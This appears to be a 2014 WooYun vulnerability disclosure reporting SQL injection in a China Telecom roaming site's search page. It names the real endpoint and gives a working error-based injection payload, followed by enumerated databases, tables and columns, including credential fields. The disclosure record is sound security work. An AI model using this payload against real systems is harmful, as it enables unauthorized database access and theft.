当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069441

漏洞标题:中国电信某分站sql注入漏洞

相关厂商:中国电信

漏洞作者: jaffer

提交时间:2014-07-23 17:48

修复时间:2014-09-06 17:52

公开时间:2014-09-06 17:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-06: 细节向公众公开

简要描述:

rt

详细说明:

中国电信国际漫游 搜索处的注入漏洞。
在搜索栏,输入1’,带上单引号。会发现出错。返回的关键信息是:

org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a WHERE  upper(a.keyName) like '%1'%' and a.isValid=1 order by orders desc) t]; nested exception is java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and a.isValid=1 order by orders desc) t' at line 1
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:549)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:617)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:717)


数据是直接带入sql语句中的。
找一个注入点:

http://manyou.189.cn/search//front/search.do?key=1&className=%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1


payload:key=1' AND (SELECT 3497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,113,102,58),(SELECT (CASE WHEN (3497=3497) THEN 1 ELSE 0 END)),CHAR(58,100,101,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eDxm'='eDxm&className=自助服务
注入结果如下:

available databases [3]:
[*] information_schema
[*] jsearch
[*] manyouideal


Database: manyouideal
[1 table]
+--------------+
| km_gm_common |
+--------------+


Database: manyouideal
Table: km_gm_common
[42 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| CALL_CHINA_NO_HK   | varchar(1000) |
| CALL_NATIVE        | varchar(1000) |
| CALL_OTHER_COUNTRY | varchar(800)  |
| CARDTYPE           | varchar(1000) |
| CARDTYPESORT       | int(11)       |
| CDMA1X             | varchar(500)  |
| CITY               | varchar(1000) |
| CONSULATE_PHONE    | varchar(500)  |
| COUNTRY            | varchar(1000) |
| COUNTRY_AREA       | varchar(500)  |
| COUNTRY_CODE       | varchar(500)  |
| COUNTRY_NAME_EN    | varchar(500)  |
| EMBASSY_PHONE      | varchar(500)  |
| EMERGENCY_PHONE    | varchar(500)  |
| FREQUENCY_RANGE    | varchar(500)  |
| GPRS               | varchar(500)  |
| HEAD_133           | varchar(800)  |
| ID                 | int(11)       |
| IDCODE             | varchar(50)   |
| INTERNET           | varchar(300)  |
| JIANPIN            | varchar(50)   |
| MIFI               | varchar(300)  |
| MSG_CHAR_LIMIT     | varchar(500)  |
| NATIVE_MOBILEPHONE | varchar(500)  |
| NATIVE_TALK        | varchar(500)  |
| NETWORK            | varchar(1000) |
| NETWORK_DEFAULT    | varchar(500)  |
| NOTICE             | varchar(1500) |
| OLDID              | int(11)       |
| OUTLET             | varchar(100)  |
| PINYIN             | varchar(50)   |
| RECEIVE_CALL       | varchar(800)  |
| RECEIVE_CODE       | varchar(500)  |
| RECEIVE_SHORTMSG   | varchar(500)  |
| REMOTE_MOBILEPHONE | varchar(500)  |
| REMOTE_TALK        | varchar(500)  |
| SEND_CHINA_LAND    | varchar(500)  |
| SEND_OTHER_COUNTRY | varchar(500)  |
| SHORTMSG_CODE      | varchar(500)  |
| SORTNUMER          | int(11)       |
| VOLTAGE            | varchar(200)  |
| WIFI               | varchar(500)  |
+--------------------+---------------+


Database: jsearch
[25 tables]
+------------------------------+
| country                      |
| t_lucene_ad                  |
| t_lucene_class               |
| t_lucene_config              |
| t_lucene_content             |
| t_lucene_datasource          |
| t_lucene_ftpserverlist       |
| t_lucene_hotlabels           |
| t_lucene_indexlogs           |
| t_lucene_indextask           |
| t_lucene_indextask_ftpserver |
| t_lucene_keyrecovery         |
| t_lucene_keywordhits         |
| t_lucene_keywordhits_0612    |
| t_lucene_keywords            |
| t_lucene_minganci            |
| t_lucene_module              |
| t_lucene_profile             |
| t_lucene_relatedkeywords     |
| t_lucene_searchserver        |
| t_lucene_servernode          |
| t_lucene_typehits            |
| t_lucene_users               |
| t_lucene_visitlog            |
| t_lucene_weight              |
+------------------------------+


只是检索信息的数据,不过这种还是需要关注下。

漏洞证明:

给出lucene的一个表的列来进一步证明吧。

Database: jsearch
Table: t_lucene_datasource
[10 columns]
+----------------+---------------+
| Column         | Type          |
+----------------+---------------+
| addDate        | timestamp     |
| content        | text          |
| dataSourceType | varchar(200)  |
| dataSql        | varchar(2000) |
| driverName     | varchar(200)  |
| id             | int(6)        |
| name           | varchar(200)  |
| password       | varchar(200)  |
| url            | varchar(500)  |
| userName       | varchar(200)  |
+----------------+---------------+

修复方案:

过滤。

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-28 09:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国电信集团公司,由其后续下发给省公司及网站管理单位处置。

最新状态:

暂无